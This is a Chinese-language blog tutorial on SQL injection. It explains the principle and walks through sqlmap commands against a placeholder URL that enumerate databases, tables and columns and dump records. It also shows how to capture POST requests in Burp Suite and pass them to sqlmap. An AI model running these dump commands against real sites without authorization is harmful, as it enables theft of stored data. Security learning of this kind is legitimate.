利用burpsuite＋sqlmap POST自动化注入详解

旧城等待， 2023-07-17 15:44 27阅读 0赞

介绍sql注入之前,我们有必要了解一下大致的网站架构,以典型架构LAMP为例![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NDIwMzE1OA_size_15_color_FFFFFF_t_70]  
对于很多企业来说,最重要的就是数据. 而这也成为sql注入被很多黑客广泛应用的一种攻击方式

### sql注入的原理 ###

1.以我们进行百度搜索时某个"关键词"时,我们客户端的请求就会被带入数据库查询.

2.正常情况下,我们应该请求一些正确的内容,比如 `www.baidu.com/s?id=1` 这里,id=1是正常的参数

3.但是如果说某个网站存在sql注入漏洞,没有对客户端的输入做过滤,那么当我输入`s?id=1' and select database() --+` 这里and后的语句就是"非法语句",显然服务端不希望我们获取响应信息.这时,sql注入就出现了.

4.简单来说,sql注入就是服务端没有对客户端的输入信息做过滤,并且信息被带入了数据库查询.

5.了解了sql注入的原理,就知道sql注入的条件了: 对用户端输入过滤不严格;并且可以带入数据库查询.

### 常用工具 ###

sqlmap：代替手动，自动构造大量的sql语句探测漏洞，高效发现目标信息  
burpsuite：抓包，拦截抓取到请求的参数，如果目标不是get请求，我们无法在url中拼接参数，所以需要抓包再结合sqlmap进入注入测试

###  get注入(使用sqlmap) ###

假设 `http://www.test.com/fu?id=111` 是存在注入点的url

#### ①sqlmap注入爆数据库 ####

`python sqlmap.py -u "http://www.test.com/fu?id=111" --dbs`

#### ②爆出对应数据库中所有的表 ####

`python sqlmap.py -u "http://www.test.com/fu?id=111" -D 库名 --tables`

#### ③爆出对应表的列名 ####

`python sqlmap.py -u "http://www.test.com/fu?id=111" -D 库名 -T 表名 --columns`

#### ④爆出表的所有记录 ####

`python sqlmap.py -u "http://www.test.com/fu?id=111" -D 库名 -T 表名 -C "字段1,字段2,字段3,字段4" --dump`

上述语法中 `-u` 可以省略

--------------------

###  post注入（burpsuite＋sqlmap） ###

post请求无法通过以上的 sql语句直接扫描，下面是对于post请求的SQL漏洞测试方法

#### ①通过burpsuite 查看请求 ####

[burpsuite的安装及使用][burpsuite]

右键`copy to file` 将请求内容保存为文件![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NDIwMzE1OA_size_16_color_FFFFFF_t_70]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NDIwMzE1OA_size_16_color_FFFFFF_t_70 1]

#### ②打开sqlmap ####

爆数据库语句 `sqlmap -r 前面保存的位置 -p 请求参数 --dbs`  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NDIwMzE1OA_size_16_color_FFFFFF_t_70 2]  
获取库名后，爆表、字段、记录其它用法和get类型的请求一致

--------------------

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NDIwMzE1OA_size_15_color_FFFFFF_t_70]: /images/20230528/e94c388c846d433c8658a3146e5fd7cd.png
[burpsuite]: https://blog.csdn.net/weixin_44203158/article/details/103511416
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NDIwMzE1OA_size_16_color_FFFFFF_t_70]: /images/20230528/eeed2b60652f4e8aad8005be5178a2af.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NDIwMzE1OA_size_16_color_FFFFFF_t_70 1]: /images/20230528/b72cfae0fb8a4597bfd094f2f2780ae5.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NDIwMzE1OA_size_16_color_FFFFFF_t_70 2]: /images/20230528/7ac2052e4dbd49dfbb169fa4ed32e97a.png